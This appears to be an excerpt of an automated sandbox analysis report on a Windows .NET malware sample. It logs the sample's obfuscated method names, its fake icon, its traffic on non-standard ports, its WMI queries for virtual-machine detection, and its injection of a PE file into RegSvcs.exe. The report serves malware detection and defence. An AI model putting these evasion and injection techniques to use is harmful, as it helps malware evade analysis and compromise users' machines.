                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, c9W0LjtbC4fBta8E8u.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Ubd9x35x9p', 'Lxr9T33nwA', 'YWP9z71pwo', 'VhWEplxTrn', 'imBElXMAOO', 'QjnE901EZh', 'PAuEER5omZ', 'FChFisZhW062oGhQ6vB'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, ddWCrGllHMjDUujjMMs.csHigh entropy of concatenated method names: 'p7viTUI651', 'YVcizhghY9', 'pHv3pHlVrn', 'LXD3lNwtuf', 'XYh39kcrKt', 'Sdr3EqFIU0', 'Krh362e7AQ', 'BBe3ZhJ3Nt', 'vRM3AjMIw7', 'rkl3oXla1q'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, OVo2uO9oWvvdGIIukb.csHigh entropy of concatenated method names: 'I0hbg7B8f', 'TS1fF8J8b', 'F1r8D01A7', 'quWJ2Owrj', 'f4OIQMYb2', 'pwF2nQ1FA', 'tpVHhH3o7J6nLeRjAK', 'ESoR0MvmrdAk4LTW7D', 'PoCUAwQ0g', 'N0nit7y9V'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, EhCKRaHhdsWu8su5Lj.csHigh entropy of concatenated method names: 'CZkGZkFNqs', 'QfyGogpfT8', 'CHNGh8GaXO', 'ns0GLaoik6', 'dLHGQndKjg', 'zgBh7FmJdX', 'GZchv5Ws4g', 'WPUhuOIMZ4', 'E37hSEQtYQ', 'I1JhxZ5w0s'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, EcaDEi6U2ggoLNcIVA.csHigh entropy of concatenated method names: 'w8UlLKnfCK', 'YBvlQUrY1H', 'VHelB4lbdC', 'qCUlNWZxfE', 'I9sl17AIhC', 'SRalahdsWu', 'h9EWd5B3BX5NDGNYex', 'CO9Es4kqCInWRr0EJ4', 'QFUllAwjPV', 'isXlEHmJXp'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, rKnfCKVTBvUrY1HLXt.csHigh entropy of concatenated method names: 'mUEo09ax0B', 'VwmoOpIuBV', 'pNDoKyEYXV', 'yFIoDi1fC8', 'HOCo7uHSPk', 'jFsovlKEFZ', 'DcIouBX7sK', 'isEoSAXf9I', 'Jlroxm8Z2i', 'iNloTa0uBL'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, JIrIkel6pInI8Xm1ZIl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Gw94wQiXAV', 'Biu4ijqmOg', 'LIN43Dk3s7', 'Ylf44LSmpo', 'maU4Xe2Fdw', 'i5r4YKOTPm', 'Ou84qTc2Wf'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, hKWgy7oAP9V2fUx985.csHigh entropy of concatenated method names: 'Dispose', 'Mk0lx6JHgp', 'G9G95gt69a', 'qcqb0wyW5I', 'EgNlT3qLBm', 'Y8Mlzvrbgr', 'ProcessDialogKey', 'o6l9pXWD75', 'Suc9lvbCDj', 'bYx99uLTNR'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, R2EI36MnNfQtmd2hPv.csHigh entropy of concatenated method names: 'UEvLAaMyJB', 'mHELtoya4M', 'PbTLGi6kfO', 'YY9GTcsKMr', 'OjWGzhmG1X', 'PiBLpg2Zlf', 'giKLl1eA85', 'rtbL9DWFK5', 'lTILESoEVF', 'qxpL6YDElu'
                    Source: 0.2.yGu4YUwMl6.exe.7380000.6.raw.unpack, JEVOx2C0XPOTEo0S0r.csHigh entropy of concatenated method names: 'QtbeVw2K9j', 'ypMeIwAN5M', 'odYeHMU9jm', 'aKPe5OPeSt', 'fX7em9bdlI', 'cuieWHeqgk', 'H4veM1wDKn', 'Onkes76a6r', 'OVUerOf1mN', 'uCMegBy9qa'

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Icon mismatch, binary includes an icon from a different legit application in order to fool users
                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (29).png
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49738
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: yGu4YUwMl6.exe PID: 7276, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: 89B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: 99B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: 9BC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: ABC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: AFE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: BFE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: CFE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2674Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4121Jump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: RegSvcs.exe, 00000003.00000002.1868243406.0000000000A77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000Jump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41C000Jump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 780008Jump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Users\user\Desktop\yGu4YUwMl6.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yGu4YUwMl6.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
